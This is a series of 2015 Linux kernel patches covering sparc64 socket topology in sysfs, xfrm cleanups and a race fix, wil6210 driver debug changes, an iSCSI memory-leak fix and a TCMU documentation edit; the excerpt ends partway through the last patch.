From acc455cffa75070d55e74fc7802b49edbc080e92 Mon Sep 17 00:00:00 2001 From: chris hyser Date: Wed, 22 Apr 2015 12:28:31 -0400 Subject: [PATCH 001/872] sparc64: Setup sysfs to mark LDOM sockets, cores and threads correctly commit 5f4826a362405748bbf73957027b77993e61e1af Author: chris hyser Date: Tue Apr 21 10:31:38 2015 -0400 sparc64: Setup sysfs to mark LDOM sockets, cores and threads correctly The current sparc kernel has no representation for sockets though tools like lscpu can pull this from sysfs. This patch walks the machine description cache and socket hierarchy and marks sockets as well as cores and threads such that a representative sysfs is created by drivers/base/topology.c. Before this patch: $ lscpu Architecture: sparc64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Big Endian CPU(s): 1024 On-line CPU(s) list: 0-1023 Thread(s) per core: 8 Core(s) per socket: 1 <--- wrong Socket(s): 128 <--- wrong NUMA node(s): 4 NUMA node0 CPU(s): 0-255 NUMA node1 CPU(s): 256-511 NUMA node2 CPU(s): 512-767 NUMA node3 CPU(s): 768-1023 After this patch: $ lscpu Architecture: sparc64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Big Endian CPU(s): 1024 On-line CPU(s) list: 0-1023 Thread(s) per core: 8 Core(s) per socket: 32 Socket(s): 4 NUMA node(s): 4 NUMA node0 CPU(s): 0-255 NUMA node1 CPU(s): 256-511 NUMA node2 CPU(s): 512-767 NUMA node3 CPU(s): 768-1023 Most of this patch was done by Chris with updates by David. Signed-off-by: Chris Hyser Signed-off-by: David Ahern Signed-off-by: David S. Miller --- arch/sparc/include/asm/cpudata_64.h | 3 +- arch/sparc/include/asm/topology_64.h | 3 +- arch/sparc/kernel/mdesc.c | 136 ++++++++++++++++++++++----- arch/sparc/kernel/smp_64.c | 13 +++ 4 files changed, 127 insertions(+), 28 deletions(-) diff --git a/arch/sparc/include/asm/cpudata_64.h b/arch/sparc/include/asm/cpudata_64.h index a6e424d185d0..a6cfdabb6054 100644 --- a/arch/sparc/include/asm/cpudata_64.h +++ b/arch/sparc/include/asm/cpudata_64.h @@ -24,7 +24,8 @@ typedef struct { unsigned int icache_line_size; unsigned int ecache_size; unsigned int ecache_line_size; - int core_id; + unsigned short sock_id; + unsigned short core_id; int proc_id; } cpuinfo_sparc; diff --git a/arch/sparc/include/asm/topology_64.h b/arch/sparc/include/asm/topology_64.h index ed8f071132e4..d1761df5cca6 100644 --- a/arch/sparc/include/asm/topology_64.h +++ b/arch/sparc/include/asm/topology_64.h @@ -40,11 +40,12 @@ static inline int pcibus_to_node(struct pci_bus *pbus) #ifdef CONFIG_SMP #define topology_physical_package_id(cpu) (cpu_data(cpu).proc_id) #define topology_core_id(cpu) (cpu_data(cpu).core_id) -#define topology_core_cpumask(cpu) (&cpu_core_map[cpu]) +#define topology_core_cpumask(cpu) (&cpu_core_sib_map[cpu]) #define topology_thread_cpumask(cpu) (&per_cpu(cpu_sibling_map, cpu)) #endif /* CONFIG_SMP */ extern cpumask_t cpu_core_map[NR_CPUS]; +extern cpumask_t cpu_core_sib_map[NR_CPUS]; static inline const struct cpumask *cpu_coregroup_mask(int cpu) { return &cpu_core_map[cpu]; diff --git a/arch/sparc/kernel/mdesc.c b/arch/sparc/kernel/mdesc.c index 26c80e18d7b1..6f80936e0eea 100644 --- a/arch/sparc/kernel/mdesc.c +++ b/arch/sparc/kernel/mdesc.c @@ -614,45 +614,68 @@ static void fill_in_one_cache(cpuinfo_sparc *c, struct mdesc_handle *hp, u64 mp) } } -static void mark_core_ids(struct mdesc_handle *hp, u64 mp, int core_id) +static void find_back_node_value(struct mdesc_handle *hp, u64 node, + char *srch_val, + void (*func)(struct mdesc_handle *, u64, int), + u64 val, int depth) { - u64 a; - - mdesc_for_each_arc(a, hp, mp, 
MDESC_ARC_TYPE_BACK) { - u64 t = mdesc_arc_target(hp, a); - const char *name; - const u64 *id; + u64 arc; - name = mdesc_node_name(hp, t); - if (!strcmp(name, "cpu")) { - id = mdesc_get_property(hp, t, "id", NULL); - if (*id < NR_CPUS) - cpu_data(*id).core_id = core_id; - } else { - u64 j; + /* Since we have an estimate of recursion depth, do a sanity check. */ + if (depth == 0) + return; - mdesc_for_each_arc(j, hp, t, MDESC_ARC_TYPE_BACK) { - u64 n = mdesc_arc_target(hp, j); - const char *n_name; + mdesc_for_each_arc(arc, hp, node, MDESC_ARC_TYPE_BACK) { + u64 n = mdesc_arc_target(hp, arc); + const char *name = mdesc_node_name(hp, n); - n_name = mdesc_node_name(hp, n); - if (strcmp(n_name, "cpu")) - continue; + if (!strcmp(srch_val, name)) + (*func)(hp, n, val); - id = mdesc_get_property(hp, n, "id", NULL); - if (*id < NR_CPUS) - cpu_data(*id).core_id = core_id; - } - } + find_back_node_value(hp, n, srch_val, func, val, depth-1); } } +static void __mark_core_id(struct mdesc_handle *hp, u64 node, + int core_id) +{ + const u64 *id = mdesc_get_property(hp, node, "id", NULL); + + if (*id < num_possible_cpus()) + cpu_data(*id).core_id = core_id; +} + +static void __mark_sock_id(struct mdesc_handle *hp, u64 node, + int sock_id) +{ + const u64 *id = mdesc_get_property(hp, node, "id", NULL); + + if (*id < num_possible_cpus()) + cpu_data(*id).sock_id = sock_id; +} + +static void mark_core_ids(struct mdesc_handle *hp, u64 mp, + int core_id) +{ + find_back_node_value(hp, mp, "cpu", __mark_core_id, core_id, 10); +} + +static void mark_sock_ids(struct mdesc_handle *hp, u64 mp, + int sock_id) +{ + find_back_node_value(hp, mp, "cpu", __mark_sock_id, sock_id, 10); +} + static void set_core_ids(struct mdesc_handle *hp) { int idx; u64 mp; idx = 1; + + /* Identify unique cores by looking for cpus backpointed to by + * level 1 instruction caches. + */ mdesc_for_each_node_by_name(hp, mp, "cache") { const u64 *level; const char *type; @@ -667,11 +690,72 @@ static void set_core_ids(struct mdesc_handle *hp) continue; mark_core_ids(hp, mp, idx); + idx++; + } +} + +static int set_sock_ids_by_cache(struct mdesc_handle *hp, int level) +{ + u64 mp; + int idx = 1; + int fnd = 0; + + /* Identify unique sockets by looking for cpus backpointed to by + * shared level n caches. + */ + mdesc_for_each_node_by_name(hp, mp, "cache") { + const u64 *cur_lvl; + + cur_lvl = mdesc_get_property(hp, mp, "level", NULL); + if (*cur_lvl != level) + continue; + + mark_sock_ids(hp, mp, idx); + idx++; + fnd = 1; + } + return fnd; +} + +static void set_sock_ids_by_socket(struct mdesc_handle *hp, u64 mp) +{ + int idx = 1; + mdesc_for_each_node_by_name(hp, mp, "socket") { + u64 a; + + mdesc_for_each_arc(a, hp, mp, MDESC_ARC_TYPE_FWD) { + u64 t = mdesc_arc_target(hp, a); + const char *name; + const u64 *id; + + name = mdesc_node_name(hp, t); + if (strcmp(name, "cpu")) + continue; + + id = mdesc_get_property(hp, t, "id", NULL); + if (*id < num_possible_cpus()) + cpu_data(*id).sock_id = idx; + } idx++; } } +static void set_sock_ids(struct mdesc_handle *hp) +{ + u64 mp; + + /* If machine description exposes sockets data use it. + * Otherwise fallback to use shared L3 or L2 caches. 
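+	 * A shared level-3 cache is tried first; only if no L3 cache nodes are
+	 * found does the code fall back to shared level-2 caches.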
+ */ + mp = mdesc_node_by_name(hp, MDESC_NODE_NULL, "sockets"); + if (mp != MDESC_NODE_NULL) + return set_sock_ids_by_socket(hp, mp); + + if (!set_sock_ids_by_cache(hp, 3)) + set_sock_ids_by_cache(hp, 2); +} + static void mark_proc_ids(struct mdesc_handle *hp, u64 mp, int proc_id) { u64 a; @@ -707,7 +791,6 @@ static void __set_proc_ids(struct mdesc_handle *hp, const char *exec_unit_name) continue; mark_proc_ids(hp, mp, idx); - idx++; } } @@ -900,6 +983,7 @@ void mdesc_fill_in_cpu_data(cpumask_t *mask) set_core_ids(hp); set_proc_ids(hp); + set_sock_ids(hp); mdesc_release(hp); diff --git a/arch/sparc/kernel/smp_64.c b/arch/sparc/kernel/smp_64.c index 61139d9924ca..19cd08d18672 100644 --- a/arch/sparc/kernel/smp_64.c +++ b/arch/sparc/kernel/smp_64.c @@ -60,8 +60,12 @@ DEFINE_PER_CPU(cpumask_t, cpu_sibling_map) = CPU_MASK_NONE; cpumask_t cpu_core_map[NR_CPUS] __read_mostly = { [0 ... NR_CPUS-1] = CPU_MASK_NONE }; +cpumask_t cpu_core_sib_map[NR_CPUS] __read_mostly = { + [0 ... NR_CPUS-1] = CPU_MASK_NONE }; + EXPORT_PER_CPU_SYMBOL(cpu_sibling_map); EXPORT_SYMBOL(cpu_core_map); +EXPORT_SYMBOL(cpu_core_sib_map); static cpumask_t smp_commenced_mask; @@ -1243,6 +1247,15 @@ void smp_fill_in_sib_core_maps(void) } } + for_each_present_cpu(i) { + unsigned int j; + + for_each_present_cpu(j) { + if (cpu_data(i).sock_id == cpu_data(j).sock_id) + cpumask_set_cpu(j, &cpu_core_sib_map[i]); + } + } + for_each_present_cpu(i) { unsigned int j; From 1ee5e6676bccbf7a035d8d35c143f1a61e602198 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 22 Apr 2015 15:51:16 +0800 Subject: [PATCH 002/872] xfrm: remove the xfrm_queue_purge definition The task of xfrm_queue_purge is same as skb_queue_purge, so remove it Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 638af0655aaf..d8c35ad4210d 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -315,14 +315,6 @@ void xfrm_policy_destroy(struct xfrm_policy *policy) } EXPORT_SYMBOL(xfrm_policy_destroy); -static void xfrm_queue_purge(struct sk_buff_head *list) -{ - struct sk_buff *skb; - - while ((skb = skb_dequeue(list)) != NULL) - kfree_skb(skb); -} - /* Rule must be locked. Release descentant resources, announce * entry dead. The rule must be unlinked from lists to the moment. */ @@ -335,7 +327,7 @@ static void xfrm_policy_kill(struct xfrm_policy *policy) if (del_timer(&policy->polq.hold_timer)) xfrm_pol_put(policy); - xfrm_queue_purge(&policy->polq.hold_queue); + skb_queue_purge(&policy->polq.hold_queue); if (del_timer(&policy->timer)) xfrm_pol_put(policy); @@ -1955,7 +1947,7 @@ static void xfrm_policy_queue_process(unsigned long arg) purge_queue: pq->timeout = 0; - xfrm_queue_purge(&pq->hold_queue); + skb_queue_purge(&pq->hold_queue); xfrm_pol_put(pol); } From 800777026eeb33585f29608c2c6131fc66d2e218 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 22 Apr 2015 17:09:54 +0800 Subject: [PATCH 003/872] xfrm: optimise the use of walk list header in xfrm_policy/state_walk The walk from input is the list header, and marked as dead, and will be skipped in loop. 
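For readers less familiar with the list helpers, the distinction the patch relies on, sketched with the equivalences from <linux/list.h> (illustrative only; the real xfrm code is in the hunk below):

	/* list_entry(ptr, type, member)       == container_of(ptr, type, member)
	 * list_first_entry(ptr, type, member) == list_entry((ptr)->next, type, member)
	 */
	struct xfrm_policy_walk_entry *x;

	/* before: starts at the dead dummy walk entry and immediately skips it */
	x = list_entry(&walk->walk.all, struct xfrm_policy_walk_entry, all);

	/* after: starts directly at the element following the saved position */
	x = list_first_entry(&walk->walk.all, struct xfrm_policy_walk_entry, all);
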
list_first_entry() can be used to return the true usable value from walk if walk is not empty Signed-off-by: Li RongQing Acked-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 4 +++- net/xfrm/xfrm_state.c | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index d8c35ad4210d..847053ec7d91 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1004,7 +1004,9 @@ int xfrm_policy_walk(struct net *net, struct xfrm_policy_walk *walk, if (list_empty(&walk->walk.all)) x = list_first_entry(&net->xfrm.policy_all, struct xfrm_policy_walk_entry, all); else - x = list_entry(&walk->walk.all, struct xfrm_policy_walk_entry, all); + x = list_first_entry(&walk->walk.all, + struct xfrm_policy_walk_entry, all); + list_for_each_entry_from(x, &net->xfrm.policy_all, all) { if (x->dead) continue; diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index f5e39e35d73a..df9318301e98 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -1626,7 +1626,7 @@ int xfrm_state_walk(struct net *net, struct xfrm_state_walk *walk, if (list_empty(&walk->all)) x = list_first_entry(&net->xfrm.state_all, struct xfrm_state_walk, all); else - x = list_entry(&walk->all, struct xfrm_state_walk, all); + x = list_first_entry(&walk->all, struct xfrm_state_walk, all); list_for_each_entry_from(x, &net->xfrm.state_all, all) { if (x->state == XFRM_STATE_DEAD) continue; From f31e8d4f7b44092b6b2ab3a6b1d4079836b6955a Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 23 Apr 2015 11:06:53 +0800 Subject: [PATCH 004/872] xfrm: fix the return code when xfrm_*_register_afinfo failed If xfrm_*_register_afinfo failed since xfrm_*_afinfo[afinfo->family] had the value, return the -EEXIST, not -ENOBUFS Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 2 +- net/xfrm/xfrm_policy.c | 2 +- net/xfrm/xfrm_state.c | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 526c4feb3b50..459796a78ab0 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -29,7 +29,7 @@ int xfrm_input_register_afinfo(struct xfrm_input_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock_bh(&xfrm_input_afinfo_lock); if (unlikely(xfrm_input_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else rcu_assign_pointer(xfrm_input_afinfo[afinfo->family], afinfo); spin_unlock_bh(&xfrm_input_afinfo_lock); diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 847053ec7d91..c4c47f337a3a 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -2808,7 +2808,7 @@ int xfrm_policy_register_afinfo(struct xfrm_policy_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock(&xfrm_policy_afinfo_lock); if (unlikely(xfrm_policy_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else { struct dst_ops *dst_ops = afinfo->dst_ops; if (likely(dst_ops->kmem_cachep == NULL)) diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index df9318301e98..e47e4980b35c 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -1908,7 +1908,7 @@ int xfrm_state_register_afinfo(struct xfrm_state_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock_bh(&xfrm_state_afinfo_lock); if (unlikely(xfrm_state_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else rcu_assign_pointer(xfrm_state_afinfo[afinfo->family], afinfo); spin_unlock_bh(&xfrm_state_afinfo_lock); From dc0565ce6e34be06730312e79b226b7408a543c8 Mon Sep 17 
00:00:00 2001 From: Li RongQing Date: Fri, 24 Apr 2015 16:49:31 +0800 Subject: [PATCH 005/872] xfrm: slightly optimise xfrm_input Check x->km.state with XFRM_STATE_ACQ only when state is not XFRM_STAT_VALID, not everytime Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 459796a78ab0..1858a45f008b 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -239,13 +239,13 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) skb->sp->xvec[skb->sp->len++] = x; spin_lock(&x->lock); - if (unlikely(x->km.state == XFRM_STATE_ACQ)) { - XFRM_INC_STATS(net, LINUX_MIB_XFRMACQUIREERROR); - goto drop_unlock; - } if (unlikely(x->km.state != XFRM_STATE_VALID)) { - XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEINVALID); + if (x->km.state == XFRM_STATE_ACQ) + XFRM_INC_STATS(net, LINUX_MIB_XFRMACQUIREERROR); + else + XFRM_INC_STATS(net, + LINUX_MIB_XFRMINSTATEINVALID); goto drop_unlock; } From bfc2dc7a69a41ba5ee268dac2c464d6b0e50eba7 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:50 +0300 Subject: [PATCH 006/872] wil6210: fw debug mode refactor module parameter debug_fw to act as "fw debug mode", where driver do nothing but allow card memory access. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/main.c | 15 +++++++++++++++ drivers/net/wireless/ath/wil6210/netdev.c | 5 +++++ drivers/net/wireless/ath/wil6210/pcie_bus.c | 6 ------ drivers/net/wireless/ath/wil6210/wil6210.h | 1 + 4 files changed, 21 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index c2a238426425..0623d8c98956 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -25,6 +25,10 @@ #define WAIT_FOR_DISCONNECT_TIMEOUT_MS 2000 #define WAIT_FOR_DISCONNECT_INTERVAL_MS 10 +bool debug_fw; /* = false; */ +module_param(debug_fw, bool, S_IRUGO); +MODULE_PARM_DESC(debug_fw, " do not perform card reset. 
For FW debug"); + bool no_fw_recovery; module_param(no_fw_recovery, bool, S_IRUGO | S_IWUSR); MODULE_PARM_DESC(no_fw_recovery, " disable automatic FW error recovery"); @@ -686,6 +690,17 @@ int wil_reset(struct wil6210_priv *wil, bool load_fw) WARN_ON(!mutex_is_locked(&wil->mutex)); WARN_ON(test_bit(wil_status_napi_en, wil->status)); + if (debug_fw) { + static const u8 mac[ETH_ALEN] = { + 0x00, 0xde, 0xad, 0x12, 0x34, 0x56, + }; + struct net_device *ndev = wil_to_ndev(wil); + + ether_addr_copy(ndev->perm_addr, mac); + ether_addr_copy(ndev->dev_addr, ndev->perm_addr); + return 0; + } + cancel_work_sync(&wil->disconnect_worker); wil6210_disconnect(wil, NULL, WLAN_REASON_DEAUTH_LEAVING, false); wil_bcast_fini(wil); diff --git a/drivers/net/wireless/ath/wil6210/netdev.c b/drivers/net/wireless/ath/wil6210/netdev.c index f2f7ea29558e..6042f61b016c 100644 --- a/drivers/net/wireless/ath/wil6210/netdev.c +++ b/drivers/net/wireless/ath/wil6210/netdev.c @@ -24,6 +24,11 @@ static int wil_open(struct net_device *ndev) wil_dbg_misc(wil, "%s()\n", __func__); + if (debug_fw) { + wil_err(wil, "%s() while in debug_fw mode\n", __func__); + return -EINVAL; + } + return wil_up(wil); } diff --git a/drivers/net/wireless/ath/wil6210/pcie_bus.c b/drivers/net/wireless/ath/wil6210/pcie_bus.c index 109986114abf..58c79166a6d1 100644 --- a/drivers/net/wireless/ath/wil6210/pcie_bus.c +++ b/drivers/net/wireless/ath/wil6210/pcie_bus.c @@ -27,10 +27,6 @@ MODULE_PARM_DESC(use_msi, " Use MSI interrupt: " "0 - don't, 1 - (default) - single, or 3"); -static bool debug_fw; /* = false; */ -module_param(debug_fw, bool, S_IRUGO); -MODULE_PARM_DESC(debug_fw, " load driver if FW not ready. For FW debug"); - static void wil_set_capabilities(struct wil6210_priv *wil) { @@ -133,8 +129,6 @@ static int wil_if_pcie_enable(struct wil6210_priv *wil) mutex_lock(&wil->mutex); rc = wil_reset(wil, false); mutex_unlock(&wil->mutex); - if (debug_fw) - rc = 0; if (rc) goto release_irq; diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index 4310972c9e16..f4681e3975ff 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -29,6 +29,7 @@ extern unsigned short rx_ring_overflow_thrsh; extern int agg_wsize; extern u32 vring_idle_trsh; extern bool rx_align_2; +extern bool debug_fw; #define WIL_NAME "wil6210" #define WIL_FW_NAME "wil6210.fw" /* code */ From db8adcbf5e7a0d5e6577b53214e6655b81cea9df Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:51 +0300 Subject: [PATCH 007/872] wil6210: debug [add|del]_key operations Provide info for [add|del]_key. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index b97172667bc7..6cc432d0b663 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -569,6 +569,9 @@ static int wil_cfg80211_add_key(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, + pairwise ? "PTK" : "GTK"); + /* group key is not used */ if (!pairwise) return 0; @@ -584,6 +587,9 @@ static int wil_cfg80211_del_key(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, + pairwise ? 
"PTK" : "GTK"); + /* group key is not used */ if (!pairwise) return 0; From de9084ef47eb4014a7ca3ccbffce285ddc2130ce Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:52 +0300 Subject: [PATCH 008/872] wil6210: trace disconnect source Trace where wil6210_disconnect() is called from. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 6cc432d0b663..37d5338ecfc7 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -507,6 +507,8 @@ static int wil_cfg80211_disconnect(struct wiphy *wiphy, int rc; struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(reason=%d)\n", __func__, reason_code); + rc = wmi_send(wil, WMI_DISCONNECT_CMDID, NULL, 0); return rc; @@ -836,6 +838,9 @@ static int wil_cfg80211_del_station(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM, reason=%d)\n", __func__, params->mac, + params->reason_code); + mutex_lock(&wil->mutex); wil6210_disconnect(wil, params->mac, params->reason_code, false); mutex_unlock(&wil->mutex); From e853c93bd8e2d92c6586ceed15542c21c8766d54 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:53 +0300 Subject: [PATCH 009/872] wil6210: stop_ap to leave interface closed cfg80211_ops.stop_ap supposed to have interface carried turned off as post condition. Fulfill this requirement. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 37d5338ecfc7..ea331e407e7f 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -822,13 +822,9 @@ static int wil_cfg80211_stop_ap(struct wiphy *wiphy, wmi_pcp_stop(wil); __wil_down(wil); - __wil_up(wil); mutex_unlock(&wil->mutex); - /* some functions above might fail (e.g. __wil_up). Nevertheless, we - * return success because AP has stopped - */ return 0; } From 137ce6104ffec1a86c8c14daf1cca15f8ef29d2c Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:54 +0300 Subject: [PATCH 010/872] wil6210: update FW file name Firmware "board" file name has changed from wil6210.board to wil6210.brd by the FW generation tools. Reflect this in the driver. 
Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/wil6210.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index f4681e3975ff..abb2080d3fa1 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -33,7 +33,7 @@ extern bool debug_fw; #define WIL_NAME "wil6210" #define WIL_FW_NAME "wil6210.fw" /* code */ -#define WIL_FW2_NAME "wil6210.board" /* board & radio parameters */ +#define WIL_FW2_NAME "wil6210.brd" /* board & radio parameters */ #define WIL_MAX_BUS_REQUEST_KBPS 800000 /* ~6.1Gbps */ From bdddbf6996c0b9299efc97b8f66e06286f3aa8c9 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 29 Apr 2015 08:42:44 +0800 Subject: [PATCH 011/872] xfrm: fix a race in xfrm_state_lookup_byspi The returned xfrm_state should be hold before unlock xfrm_state_lock, otherwise the returned xfrm_state maybe be released. Fixes: c454997e6[{pktgen, xfrm} Introduce xfrm_state_lookup_byspi..] Cc: Fan Du Signed-off-by: Li RongQing Acked-by: Fan Du Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_state.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index f5e39e35d73a..96688cd0f6f1 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -927,8 +927,8 @@ struct xfrm_state *xfrm_state_lookup_byspi(struct net *net, __be32 spi, x->id.spi != spi) continue; - spin_unlock_bh(&net->xfrm.xfrm_state_lock); xfrm_state_hold(x); + spin_unlock_bh(&net->xfrm.xfrm_state_lock); return x; } spin_unlock_bh(&net->xfrm.xfrm_state_lock); From a928d28d4487402e6bd18bea1b8cc2b2ec6e6d8f Mon Sep 17 00:00:00 2001 From: Evgenii Lepikhin Date: Tue, 21 Apr 2015 15:49:57 +0300 Subject: [PATCH 012/872] ISCSI: fix minor memory leak This patch adds a missing kfree for sess->sess_ops memory upon transport_init_session() failure. Signed-off-by: Evgenii Lepikhin Signed-off-by: Nicholas Bellinger --- drivers/target/iscsi/iscsi_target_login.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c index 8ce94ff744e6..70d799dfab03 100644 --- a/drivers/target/iscsi/iscsi_target_login.c +++ b/drivers/target/iscsi/iscsi_target_login.c @@ -346,6 +346,7 @@ static int iscsi_login_zero_tsih_s1( if (IS_ERR(sess->se_sess)) { iscsit_tx_login_rsp(conn, ISCSI_STATUS_CLS_TARGET_ERR, ISCSI_LOGIN_STATUS_NO_RESOURCES); + kfree(sess->sess_ops); kfree(sess); return -ENOMEM; } From 8ee83a747ac2309934c229281dda8f26648ec462 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Fri, 1 May 2015 10:43:45 -0700 Subject: [PATCH 013/872] target/user: Disallow full passthrough (pass_level=0) TCMU requires more work to correctly handle both user handlers that want all SCSI commands (pass_level=0) for a se_device, and also handlers that just want I/O commands and let the others be emulated by the kernel (pass_level=1). Only support the latter for now. For full passthrough, we will need to support a second se_subsystem_api template, due to configfs attributes being different between the two modes. Thus pass_level is extraneous, and we can remove it. The ABI break for TCMU v2 is already applied for this release, so it's best to do this now to avoid another ABI break in the future. 
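As background for the configfs hunk below, a minimal sketch of how such device-attribute strings are tokenized with the kernel's match_table_t parser; the option name and enum here are made up for illustration, and removing pass_level amounts to deleting its table entry and switch case:

	#include <linux/parser.h>

	enum { Opt_size, Opt_err };

	static match_table_t example_tokens = {
		{Opt_size, "size=%u"},
		{Opt_err, NULL}
	};

	/* Parse one "key=value" option from a configfs params string. */
	static int parse_one_option(char *p, int *size_out)
	{
		substring_t args[MAX_OPT_ARGS];

		switch (match_token(p, example_tokens, args)) {
		case Opt_size:
			return match_int(&args[0], size_out);
		default:
			return -EINVAL;		/* unknown option */
		}
	}
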
Signed-off-by: Andy Grover Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 18 +++----- drivers/target/target_core_user.c | 68 ++-------------------------- 2 files changed, 10 insertions(+), 76 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index 43e94ea6d2ca..c80bf1ed8981 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -15,7 +15,7 @@ Contents: a) Discovering and configuring TCMU uio devices b) Waiting for events on the device(s) c) Managing the command ring -3) Command filtering and pass_level +3) Command filtering 4) A final note @@ -360,17 +360,13 @@ int handle_device_events(int fd, void *map) } -Command filtering and pass_level --------------------------------- +Command filtering +----------------- -TCMU supports a "pass_level" option with valid values of 0 or 1. When -the value is 0 (the default), nearly all SCSI commands received for -the device are passed through to the handler. This allows maximum -flexibility but increases the amount of code required by the handler, -to support all mandatory SCSI commands. If pass_level is set to 1, -then only IO-related commands are presented, and the rest are handled -by LIO's in-kernel command emulation. The commands presented at level -1 include all versions of: +Initial TCMU support is for a filtered commandset. Only 